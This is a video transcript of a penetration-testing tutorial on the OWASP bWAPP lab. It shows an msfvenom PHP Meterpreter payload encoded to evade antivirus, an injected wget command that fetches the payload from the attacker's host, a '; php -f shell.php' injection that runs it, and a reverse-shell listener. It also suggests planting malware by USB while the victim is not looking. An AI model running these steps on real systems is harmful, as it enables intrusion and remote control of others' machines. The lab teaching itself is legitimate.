1
00:00:00,180 --> 00:00:04,720
Hello everybody and welcome back. Let us actually get started with some of

2
00:00:04,720 --> 00:00:06,750
our first exploitations.

3
00:00:06,750 --> 00:00:11,430
So what you want to do is open up your msfconsole, first of all.

4
00:00:11,580 --> 00:00:17,580
Next thing that you want to do is basically let us actually open up our OWASP virtual machine as

5
00:00:17,580 --> 00:00:18,340
well.

6
00:00:18,360 --> 00:00:25,320
So for me it is already up and running. If it is not for you, you want to open it. And let's go open up

7
00:00:25,380 --> 00:00:27,390
our Firefox for a moment.

8
00:00:27,480 --> 00:00:36,630
Now what we will be doing in this tutorial is basically I will show you how you can get the meterpreter

9
00:00:36,650 --> 00:00:41,730
shell back with the command injection attack that we already covered before.

10
00:00:41,730 --> 00:00:43,960
So you should be already familiar with that.

11
00:00:43,980 --> 00:00:49,680
You remember when we pinged that website and we actually managed to connect the target machine back to

12
00:00:49,680 --> 00:00:50,370
us?

13
00:00:50,370 --> 00:00:52,560
Now we will be doing the same thing just

14
00:00:52,560 --> 00:00:56,260
right now we will be getting the meterpreter shell back.

15
00:00:56,280 --> 00:01:02,000
I will also show you how to do the same thing with the PHP injection vulnerability.

16
00:01:02,100 --> 00:01:08,850
Now we didn't cover PHP code injection but it is simple, and it is almost the same as the other injections

17
00:01:08,850 --> 00:01:09,750
that we did before.

18
00:01:09,750 --> 00:01:16,620
So it is just injecting a certain type of code and injecting it into a browser that isn't very well filtered.

19
00:01:17,040 --> 00:01:20,560
So the user input is also read as a code.

20
00:01:20,610 --> 00:01:24,760
So let us first of all go to the OWASP virtual machine.

21
00:01:24,780 --> 00:01:31,180
So it is one 192.168.1.2.

22
00:01:31,500 --> 00:01:38,850
It will open up our standard OWASP virtual machine welcome page,

23
00:01:39,210 --> 00:01:43,210
where we have all of our stuff that we need. And where we want to go,

24
00:01:43,230 --> 00:01:44,160
let me see,

25
00:01:44,160 --> 00:01:48,670
we want to go to the bWAPP right here. Now

26
00:01:48,780 --> 00:01:51,390
the login is same as before, so bee

27
00:01:51,420 --> 00:01:59,550
and then bug right here in order to login.  Press enter, and you are logged into this. Now since I already

28
00:01:59,550 --> 00:02:06,690
before removed my burpsuite proxy preferences, you will want to turn it on once again.

29
00:02:06,690 --> 00:02:09,010
So let me just go right here.

30
00:02:09,120 --> 00:02:15,490
So we will use burpsuite as well with the mixture of metasploit, and with the mixture of the

31
00:02:18,200 --> 00:02:19,140
OWASP virtual machine.

32
00:02:19,140 --> 00:02:21,370
So just scroll down.

33
00:02:22,710 --> 00:02:23,370
Let me go.

34
00:02:23,370 --> 00:02:29,190
here on the settings and set my manual proxy configuration. Now I removed all of these boxing configurations

35
00:02:29,190 --> 00:02:34,870
which are basically used for burpsuite. Please make sure to set them once again and click here.

36
00:02:34,950 --> 00:02:35,600
OK,

37
00:02:36,640 --> 00:02:38,430
and we will be good to go.

38
00:02:38,460 --> 00:02:42,950
But right now you will notice that if I repload the page I will not be able to connect to it.

39
00:02:43,000 --> 00:02:50,510
That is because we are not running the burpsuite. So open up another terminal, type

40
00:02:50,540 --> 00:02:57,670
burpsuite, press enter, and let us open our proxy. So we will be able to inspect packets right here, and we will

41
00:02:57,670 --> 00:03:05,740
be sending some of the other stuff into the website, such as our meterpreter shell, and such as some

42
00:03:05,740 --> 00:03:06,790
of the other commands.

43
00:03:06,820 --> 00:03:15,340
So let us just click OK right here, and while this is opening let us actually check out the page that

44
00:03:15,400 --> 00:03:17,020
we will be attacking.

45
00:03:17,020 --> 00:03:18,250
Oh, yeah, I forgot

46
00:03:18,250 --> 00:03:26,560
we need to wait for the bupsuite to open. So click here next, then start, for us to start the burpsuite.

47
00:03:26,560 --> 00:03:26,920
Oops,

48
00:03:26,920 --> 00:03:29,290
we do not want to cancel. So click here,

49
00:03:29,290 --> 00:03:29,790
no.

50
00:03:32,510 --> 00:03:38,270
And we will wait for this to open, and then we will go to the page of the PHP code injection. And then after

51
00:03:38,270 --> 00:03:44,500
that, we will go to the command code injection. First of all, let's go to the command code injection

52
00:03:44,510 --> 00:03:49,280
since that is something that you're familiar with, and probably will understand it easier.

53
00:03:49,280 --> 00:03:54,830
So before we do any of that, just go to the proxy intercept and turn the intercept off so we can load

54
00:03:54,860 --> 00:03:56,880
the pages properly.

55
00:03:56,960 --> 00:04:03,800
Now when we go to the page and we reloaded once again, we successfully connect to it. And here what you

56
00:04:03,800 --> 00:04:04,580
want to choose

57
00:04:04,610 --> 00:04:10,310
is the OS command injection. As I said before, we should already be familiar with this.

58
00:04:10,340 --> 00:04:13,040
So just click on hack right here.

59
00:04:13,040 --> 00:04:18,470
We didn't really cover the OS command injection from this page, we covered it from the other page, but

60
00:04:18,560 --> 00:04:21,170
it is the same principle.

61
00:04:21,170 --> 00:04:27,170
So in the previous attack that we did a command injection you can remember that we actually pinged

62
00:04:27,170 --> 00:04:28,730
the website.

63
00:04:28,770 --> 00:04:34,330
And right here we are performing the DNS lookup. So let's see what happens when we just run this

64
00:04:34,350 --> 00:04:36,980
with the default server right here.

65
00:04:36,980 --> 00:04:41,390
We can see server and then this IP address address,

66
00:04:41,390 --> 00:04:43,210
so this basically the router,

67
00:04:43,550 --> 00:04:45,910
and then we have some of the other options as well.

68
00:04:45,920 --> 00:04:48,500
So IP address at the end is this one,

69
00:04:48,800 --> 00:04:54,020
it doesn't even matter. So what matters for us is what happens if we run that.

70
00:04:54,020 --> 00:05:00,590
And then after that we also specify ls, which is the command to list all of the directories and files

71
00:05:00,620 --> 00:05:05,350
in that sub directory. So we click here ls, and just as simple as that

72
00:05:05,360 --> 00:05:11,480
we can now see that this website is vulnerable to the command injection.

73
00:05:11,510 --> 00:05:14,770
It should actually specify...

74
00:05:14,780 --> 00:05:21,710
It also specified all of the files that it has in that directory on the eats machine, which it shouldn't

75
00:05:21,710 --> 00:05:22,760
be specifying.

76
00:05:23,210 --> 00:05:32,120
So now that we know that, what we want to do next is basically we want to make a meterpreter shell

77
00:05:35,360 --> 00:05:38,780
that is basically running over PHP.

78
00:05:38,780 --> 00:05:45,500
Now why over PHP? As we can see right here all these file are .PHP, and we can actually upload the shell

79
00:05:45,590 --> 00:05:52,390
on this web server, and run it, and make it make the web server connect to our virtual machine.

80
00:05:52,520 --> 00:06:03,420
So let us do that by starting off with creating the meterpreter PHP shell.

81
00:06:03,560 --> 00:06:10,220
So this is where we introduce, for the first time, the MSF venom tool, which we will use in order to create the

82
00:06:10,220 --> 00:06:11,180
meterpreter shell.

83
00:06:11,180 --> 00:06:21,440
So let's start off with that first. We can actually leave this. I said leave it and

84
00:06:21,440 --> 00:06:29,450
then closed. It doesn't even matter. So we need to leave this and let's open a new terminal. Make it larger

85
00:06:29,510 --> 00:06:35,800
and then zoom in so you can see this better. We will use a simple syntax for the MSF venom.

86
00:06:36,020 --> 00:06:38,450
What we want to do right here is this,

87
00:06:38,480 --> 00:06:46,810
so follow me. msfvenom, and then after that, basically, if you want to you can just type --help.

88
00:06:46,850 --> 00:06:51,590
I believe it will print the available options, but let's not bother with this at the moment.

89
00:06:51,590 --> 00:06:55,820
Just follow with what I'm typing and I will explain while I'm going through it.

90
00:06:55,820 --> 00:07:04,040
So msfvenom...now -p option will actually after that specify the payload that you will use.

91
00:07:04,070 --> 00:07:10,130
So we want to use PHP meterpreter and then reverse TCP.

92
00:07:10,130 --> 00:07:15,710
So php/meterpreter/reverse_tcp.

93
00:07:15,890 --> 00:07:26,180
Now in order for you to understand it better, let me actually open paint and I will draw a simple drawing

94
00:07:26,270 --> 00:07:29,110
of what our reverse TCP shell means.

95
00:07:29,140 --> 00:07:36,470
So we have our PC right here which is the attacker's PC.

96
00:07:36,470 --> 00:07:44,100
This is our good ole Kali Linux machine that's selected as "A" for the attacker.

97
00:07:44,100 --> 00:07:50,490
And here we have the victim machine which we are attacking. So we want to send the shell to the victim

98
00:07:50,490 --> 00:07:50,970
machine.

99
00:07:50,970 --> 00:07:58,150
This is in our case the OWASP virtual machine, which we will select with "V" as victim.

100
00:07:58,170 --> 00:08:06,630
So the problem with connecting, just simply connecting to the open port, is that this machine might have

101
00:08:06,690 --> 00:08:08,640
a firewall around it. Not might,

102
00:08:08,640 --> 00:08:14,700
basically all of the machines. All of the networks basically nowadays have firewalls, but what firewall

103
00:08:14,730 --> 00:08:21,660
cannot prevent is the victim machine connecting back to us.

104
00:08:21,660 --> 00:08:23,100
Now how will we do that?

105
00:08:23,100 --> 00:08:30,120
So, first of all, the reason why the firewall won't prevent it is the same as, for example, imagine if

106
00:08:30,120 --> 00:08:36,030
I opened my virtual machine right here, Kali Linux, went to Firefox, and my firewall blocked me from

107
00:08:36,030 --> 00:08:38,020
going to Google.com.

108
00:08:38,580 --> 00:08:44,480
That is the firewall blocking the outgoing connections, which it most likely never does.

109
00:08:44,490 --> 00:08:48,190
So, let me just continue my drawing right here.

110
00:08:48,210 --> 00:08:53,210
What we want to do is we want to send the file to this machine right here.

111
00:08:53,550 --> 00:08:59,460
The file, so let's imagine "X" is that file and we sent it to the victim machine,

112
00:08:59,460 --> 00:09:05,330
and what that file would will do is basically it will initiate the connection with us.

113
00:09:05,370 --> 00:09:12,120
So this file when it is run on the victim machine, or when it is started up on the machine,

114
00:09:12,510 --> 00:09:14,460
it will try to connect to us.

115
00:09:14,820 --> 00:09:16,830
So the firewall won't be able to stop it

116
00:09:16,830 --> 00:09:23,430
since the victim machine itself tried to connect to us. And while it tries to connect to us we will be

117
00:09:23,520 --> 00:09:27,390
listening for the outgoing or incoming connections.

118
00:09:27,510 --> 00:09:33,510
And once this program is started it will connect back to us, and we will be able to communicate with

119
00:09:33,510 --> 00:09:38,070
this machine and execute commands in it, and so on and so on.

120
00:09:38,310 --> 00:09:42,630
But you might be asking, how are we going to get that file on the victim machine?

121
00:09:42,630 --> 00:09:43,900
Well, that is simple.

122
00:09:44,010 --> 00:09:49,770
If the victim machine is vulnerable to the PHP code injection or to the OS command injection, we

123
00:09:49,860 --> 00:09:57,960
will be able to execute it just by making the the machine download it with command

124
00:09:57,960 --> 00:09:59,150
injection.

125
00:09:59,340 --> 00:10:06,090
But if, for example, the machine isn't vulnerable to anything, which we will cover in the later videos when

126
00:10:06,090 --> 00:10:08,160
the machine doesn't have any vulnerability,

127
00:10:08,310 --> 00:10:14,970
the only way for the victim to download that file is if it clicks on the download button and if it runs

128
00:10:14,970 --> 00:10:22,110
it itself. We will not be able to run the file for the victim itself. Or, there is another way.

129
00:10:22,110 --> 00:10:29,520
If the victim is physically close to you, you can actually take your USB drive, transfer the file onto

130
00:10:29,520 --> 00:10:34,830
the USB drive, and transfer to the victim machine while they are not looking, or something like that, and

131
00:10:34,830 --> 00:10:40,250
then run the file. And basically you just did all of this process by yourself,

132
00:10:40,260 --> 00:10:48,840
just being physically on their laptop or on their PC.

133
00:10:49,050 --> 00:10:51,250
So, I hope you understood this.

134
00:10:51,250 --> 00:10:57,330
So, the basic idea behind this is that the victim is trying to connect back to us with our malware program,

135
00:10:57,480 --> 00:10:59,630
or with our PHP meterpreter shell.

136
00:11:00,090 --> 00:11:07,190
So let us continue now with actually making this. Now the name of that shell is meterpreter.

137
00:11:07,200 --> 00:11:11,910
We will use it with PHP and we use the reverse TCP connection.

138
00:11:11,980 --> 00:11:16,980
Now there are some of the other options as well but we will use these ones for now.

139
00:11:16,980 --> 00:11:23,340
Now after you specify all of this, the next thing we want to specify is the local host IP address.

140
00:11:23,340 --> 00:11:25,290
Now what is the local host IP address?

141
00:11:25,290 --> 00:11:28,410
That is the IP address of the host that's listening.

142
00:11:28,410 --> 00:11:31,680
Which in this case the host that is listening is you.

143
00:11:31,710 --> 00:11:34,680
So you as attacker are the listening host.

144
00:11:34,680 --> 00:11:41,100
So, what we need to specify right here after the LHOST, then equals and then the IP address.

145
00:11:41,130 --> 00:11:46,380
So let me just check what the IP address is from this machine.

146
00:11:46,390 --> 00:11:47,520
So ifconfig...

147
00:11:47,940 --> 00:11:49,450
it is.1.7,

148
00:11:49,580 --> 00:11:50,770
okay.

149
00:11:51,420 --> 00:11:55,340
And then we specify 192.168.1.7.

150
00:11:55,800 --> 00:11:59,940
And after that we need to specify the out port as well,

151
00:11:59,940 --> 00:12:02,620
and that is the port that you are listening on.

152
00:12:02,640 --> 00:12:04,040
It is also your port.

153
00:12:04,050 --> 00:12:08,790
So, by default Metasploit is set on the 4444 port,

154
00:12:08,820 --> 00:12:10,340
so we will just keep with that.

155
00:12:10,340 --> 00:12:13,230
So just 4444,

156
00:12:13,230 --> 00:12:14,200
select that,

157
00:12:14,610 --> 00:12:18,930
and after that you can select some of the other options that are actually optional.

158
00:12:18,930 --> 00:12:25,590
So, we will select that so I can just show you. For example, let's use the encoder.

159
00:12:25,590 --> 00:12:28,980
Now the encoder...I covered what an encoder is in the previous video.

160
00:12:28,980 --> 00:12:34,890
So basically it's used to most likely bypass anti viruses, which actually we do not need in this case

161
00:12:34,920 --> 00:12:36,850
but I will show you how you can use it.

162
00:12:36,960 --> 00:12:43,460
So the encoder will scramble the code, we will not be able to see the code itself in raw format.

163
00:12:43,470 --> 00:12:52,780
We will be seeing scrambled, encrypted code. So the encoder that I will use is php/base64.

164
00:12:53,490 --> 00:13:00,300
What else we want to specify at the end is -f, and then file to be raw, and after that we want to

165
00:13:00,300 --> 00:13:09,060
specify this narrow and just save that into reverseshell.php

166
00:13:09,290 --> 00:13:12,110
Let us actually name shell.php,

167
00:13:12,240 --> 00:13:14,100
there is no need for that long name.

168
00:13:14,430 --> 00:13:19,380
Once we select all of this and once we double check all of the options that we set,

169
00:13:19,380 --> 00:13:20,640
you can click click here

170
00:13:20,640 --> 00:13:21,140
enter,

171
00:13:30,880 --> 00:13:33,520
and this will take a few seconds to finish.

172
00:13:33,640 --> 00:13:38,020
It will be around 1000 bytes large, or 1100 bytes, something like that,

173
00:13:38,020 --> 00:13:39,460
if I remember correctly.

174
00:13:43,610 --> 00:13:44,500
So,

175
00:13:44,560 --> 00:13:45,110
OK.

176
00:13:45,130 --> 00:13:47,570
Now because of the encoder it is a little bit larger.

177
00:13:47,570 --> 00:13:53,450
So, our meterpreter PHP shell is now 1506 bytes large.

178
00:13:53,570 --> 00:13:59,570
If you press here ls, you'll be able to see it is right here.

179
00:13:59,570 --> 00:14:01,960
So this is our shell.php,

180
00:14:01,960 --> 00:14:07,090
this is our malware, and this is our program that we will be sending to the victim machine.

181
00:14:07,100 --> 00:14:09,560
We created it with this command.

182
00:14:09,560 --> 00:14:14,150
Now there are a few things that you need to do when you make the PHP reverse shell.

183
00:14:14,150 --> 00:14:16,700
First of all, you need to add the PHP tag.

184
00:14:16,730 --> 00:14:19,730
since it doesn't come with that.

185
00:14:19,730 --> 00:14:22,130
So, this is the scrambled code.

186
00:14:22,130 --> 00:14:26,930
This is basically B64 encoded code as we can see right here.

187
00:14:26,930 --> 00:14:31,770
This is the function that is used to decode the base64.

188
00:14:31,820 --> 00:14:37,880
We can see this doesn't look anywhere close to the programming language but that is why we use the encoder,

189
00:14:38,090 --> 00:14:42,470
so it doesn't get detected by antivirus on legit websites.

190
00:14:42,470 --> 00:14:46,910
So, what we want to do is add the PHP tag.

191
00:14:46,940 --> 00:14:52,380
So, first of all, up here we want to add this tag, and then a question mark and then PHP.

192
00:14:52,430 --> 00:14:58,640
So that is the opening tag, and at the end we want to add the question mark and then closing tag.

193
00:14:58,640 --> 00:15:05,090
You need to add this in order for the program or for the machine to recognize this as the PHP code.

194
00:15:05,100 --> 00:15:10,930
So, ctrl + O to save, ctrl + X to exit.

195
00:15:11,180 --> 00:15:13,730
And now we are good to go.

196
00:15:13,730 --> 00:15:21,080
The only thing we need to do right now is set this file or program somewhere where it can be downloaded

197
00:15:21,080 --> 00:15:21,580
from.

198
00:15:21,740 --> 00:15:26,930
Now that place would be the Apache 2 web server.

199
00:15:26,930 --> 00:15:30,650
So you want to send this to your Apache web server.

200
00:15:30,740 --> 00:15:34,170
So let us go to var/

201
00:15:34,430 --> 00:15:39,260
www/html, which is the location of all the programs that are available

202
00:15:39,260 --> 00:15:42,690
on your Apache 2 web server, and just type here ls.

203
00:15:43,100 --> 00:15:49,190
Let me delete the previous files that we used in the previous tutorials, and remove the index.html.

204
00:15:49,200 --> 00:15:56,900
And what I want to do is copy, or actually move, root/shell.php, or basically

205
00:15:56,960 --> 00:16:06,020
whatever path to your shell.php is, and move it to var/www/html. And we can see that right now

206
00:16:06,020 --> 00:16:08,080
we have this shell.php right here.

207
00:16:08,120 --> 00:16:12,080
If we cat it we can see that

208
00:16:12,170 --> 00:16:16,200
this is the PHP shell that we'll be sending to the OWASP virtual machine.

209
00:16:16,340 --> 00:16:23,990
We added the PHP tages, closed the PHP tags, and this is the encoded page code.

210
00:16:23,990 --> 00:16:30,710
So, right now the next thing we want to do is make sure that Apache 2 is running. So service apache2

211
00:16:30,710 --> 00:16:32,900
status.

212
00:16:33,260 --> 00:16:35,570
We can see that is active and running.

213
00:16:35,870 --> 00:16:43,150
And right now what we want to do is go to our IP address, which is 192.168.1.7,

214
00:16:43,160 --> 00:16:44,170
I believe,

215
00:16:45,540 --> 00:16:52,250
and we can see that right here we have available online the shell.php file.

216
00:16:52,490 --> 00:16:55,930
Now what we want to do, we want to make that vicitim

217
00:16:55,940 --> 00:16:58,630
PC actually download this file.

218
00:16:58,640 --> 00:17:04,780
So how do we do that? Since it is vulnerable to the command injection,

219
00:17:04,970 --> 00:17:13,690
what you want to do is basically let me just show you right here. What you want to do is use a simple

220
00:17:13,690 --> 00:17:21,790
tool that is on all Linux systems, which is called wget. Now wget is basically used to download

221
00:17:21,790 --> 00:17:22,360
the file.

222
00:17:22,630 --> 00:17:25,900
So let me show you how that looks like on our Linux machine.

223
00:17:25,900 --> 00:17:29,340
So let me just close this since we do not need it.

224
00:17:29,500 --> 00:17:40,450
And let's actually go to root and mkdir test, and go to test. Here we do not have anything. But if

225
00:17:40,450 --> 00:17:49,330
we run this command wget, and then we run 192.168.1.7 and we need to specify

226
00:17:49,360 --> 00:17:50,530
what we are downloading.

227
00:17:50,530 --> 00:17:57,100
So we need to specify the /shell.php since that is the name of our file that is located

228
00:17:57,220 --> 00:18:04,450
in the www/html folder. We press here enter and this will download the file for us. As we

229
00:18:04,450 --> 00:18:05,860
can see it downloaded

230
00:18:05,870 --> 00:18:08,980
shell.php just with this simple one command.

231
00:18:08,980 --> 00:18:15,490
So if I type here ls once again, we can see that the shell.php is in our folder. if we cat it you can

232
00:18:15,490 --> 00:18:17,300
see...opps.

233
00:18:18,310 --> 00:18:23,280
No idea why it doesn't actually contain something.

234
00:18:23,290 --> 00:18:28,980
It could be because of that problem with my Apache 2 web server.

235
00:18:28,980 --> 00:18:33,460
So what I will do is I will host this real quick on my

236
00:18:36,160 --> 00:18:38,740
laptop. So I will create a save file.

237
00:18:38,740 --> 00:18:43,120
Just give me one second and then it should work.

238
00:18:43,120 --> 00:18:45,070
So, just one second.

239
00:18:47,020 --> 00:18:56,080
So I created the file on my laptop, and it should take a few seconds to finish, and I will download

240
00:18:56,080 --> 00:18:57,140
the file from there.

241
00:18:57,160 --> 00:19:02,620
Now you can continue downloading it from your own Apache 2 web server since the problem is only

242
00:19:02,620 --> 00:19:03,320
with mine.

243
00:19:03,340 --> 00:19:09,970
I don't have and idea why it doesn't work, but on all the other Kali Linux machines it basically does work.

244
00:19:09,970 --> 00:19:12,280
But for some reason here it will not work.

245
00:19:12,280 --> 00:19:18,040
So let me just add the PHP tags to my shell on my laptop.

246
00:19:18,040 --> 00:19:30,850
So what I want to add is this, and ?php, and then ? and close tag. And now if we visit

247
00:19:31,020 --> 00:19:34,300
the laptop we should have the same file.

248
00:19:34,560 --> 00:19:37,780
So we changed this IP address to the IP address on my laptop,

249
00:19:37,950 --> 00:19:40,220
and here we have the same shell.php

250
00:19:40,560 --> 00:19:49,060
So let's actually try to now wget 192.168.1.15.

251
00:19:49,770 --> 00:19:52,150
And here it downloaded a file.

252
00:19:52,210 --> 00:19:52,560
Woops.

253
00:19:52,560 --> 00:19:54,750
Why is it called index.html?

254
00:19:54,870 --> 00:19:55,930
I have no idea.

255
00:19:56,890 --> 00:20:01,710
OK, so we didn't specify of course the file itself.

256
00:20:01,710 --> 00:20:03,840
What we need to specify is

257
00:20:03,840 --> 00:20:08,700
wget 192.168.1.15/shell.php,

258
00:20:08,700 --> 00:20:10,690
so it actually downloads the correct files.

259
00:20:10,700 --> 00:20:15,600
So now if we cat it we can see that we get the entire file right here.

260
00:20:15,700 --> 00:20:22,170
Now this was only the problem with the Apache 2 from my Kali Linux web server. So don't mind this,

261
00:20:22,170 --> 00:20:27,060
you should be good to go. And let us continue with the attack.

262
00:20:27,060 --> 00:20:32,760
So right now what we want to do is perform the command injection. So we know that there is a vulnerable

263
00:20:32,790 --> 00:20:39,630
input right here, and let's actually exploit it right now. So we can just delete this and then type here

264
00:20:39,640 --> 00:20:45,870
ls, once again, to see if it still works. We will get all of the files in the current directory since

265
00:20:45,870 --> 00:20:48,840
it is vulnerable. And let us right right now

266
00:20:50,090 --> 00:20:58,770
type the same command. So wget 192.168.1.15/shell.php

267
00:20:58,850 --> 00:21:05,780
We saw that it works in our Kali Linux machine, so let's perform this right here. As we can see it performed

268
00:21:05,780 --> 00:21:10,520
it without any error. And right now if we type here

269
00:21:10,530 --> 00:21:18,560
ls once again, let's actually try to find if right now it successfully downloaded the shell.

270
00:21:18,560 --> 00:21:19,160
php

271
00:21:19,160 --> 00:21:21,530
So it should be somewhere around s,

272
00:21:21,740 --> 00:21:30,680
so let me just find...here it is, shell.php, and we successfully got the shell.php file on

273
00:21:30,740 --> 00:21:36,830
our target machine with a simple command. And we didn't have to make anyone click on anything, or we didn't

274
00:21:36,830 --> 00:21:42,290
have to make basically any physical contact with that machine.

275
00:21:42,290 --> 00:21:48,260
Now in order for you to execute this file you will need to type a certain command. But before we type

276
00:21:48,260 --> 00:21:52,680
that command, we need to start listening on a certain port.

277
00:21:53,090 --> 00:22:01,550
So let us open our msfconsole so we can continue with this attack. Right now before we execute the

278
00:22:01,550 --> 00:22:04,280
shell.php on the victim,

279
00:22:04,280 --> 00:22:07,850
we want to start our listener in our Metasploit framework.

280
00:22:14,580 --> 00:22:20,910
So this is opening. What you want to use right here is something called exploit multi/handler.

281
00:22:21,000 --> 00:22:23,390
So this is something that you will lose a lot.

282
00:22:23,430 --> 00:22:32,340
Just type here use exploit/multi/handler. If you show options, you can see that there are no

283
00:22:32,340 --> 00:22:33,210
options right here.

284
00:22:33,210 --> 00:22:38,310
So what you want to do is set the payload, set payload

285
00:22:41,080 --> 00:22:50,940
php/meterpreterreverse_tcp

286
00:22:54,180 --> 00:22:56,090
why did it stop?

287
00:22:56,090 --> 00:22:58,160
It got stuck.

288
00:22:58,160 --> 00:22:59,480
OK, so here it is.

289
00:22:59,660 --> 00:23:01,100
reverse_tcp.

290
00:23:01,460 --> 00:23:08,000
Show options once again, and we can see that we get the whole LHOST to listen on. Now double check the

291
00:23:08,000 --> 00:23:13,850
port we specified in that command while we were making shell.php that the LPORT is 4444,

292
00:23:14,240 --> 00:23:17,810
and the LHOST is the IP address of our own machine.

293
00:23:17,840 --> 00:23:22,370
So we listen to our own connection. So set LHOST

294
00:23:22,410 --> 00:23:25,030
192.168.1.7.

295
00:23:25,160 --> 00:23:27,270
Let me just check if that is really my IP address.

296
00:23:27,270 --> 00:23:33,970
OK, so it is. And all I need to do is type here exploit right now, and this will wait for an incoming connection.

297
00:23:33,970 --> 00:23:40,010
So right now we are waiting for someone to run that program on the target machine. But since nobody will

298
00:23:40,010 --> 00:23:46,580
really do it, we have to do it ourselves. And we can do it since that server is vulnerable to the command

299
00:23:46,580 --> 00:23:56,150
injection. So just type ; and then what we want to do is basically php -f and then

300
00:23:56,150 --> 00:24:06,200
shell.php. This command right here will run the PHP file. And we can see if I press here Lookup, we get

301
00:24:06,290 --> 00:24:14,370
a meterpreter session 1 opened. We can see right here that it is on a connection from our OWASP virtual

302
00:24:14,430 --> 00:24:20,450
machine, or basically this is a connection from our OWASP virtual machine, which it's IP address is

303
00:24:20,500 --> 00:24:25,070
1.2, and the IP address of this is our Kali Linux machine.

304
00:24:25,070 --> 00:24:32,990
So we successfully got meterpreter open. Now we can check that it really is that machine. If I go right

305
00:24:32,990 --> 00:24:40,670
here on ifconfig, and type it once again, you can see that it truly is the 192.

306
00:24:40,670 --> 00:24:48,920
168.1.2. Now that will be about it for this tutorial. We will cover the other exploits as well,

307
00:24:48,950 --> 00:24:55,790
and we will also show what we can do with a meterpreter session open. So what can we execute, what

308
00:24:55,790 --> 00:24:59,730
post exploitation tools can we use, and so on and so on.

309
00:24:59,810 --> 00:25:01,750
So that's about it for now.

310
00:25:02,090 --> 00:25:05,210
I hope I see you in the next tutorial and take care. Bye!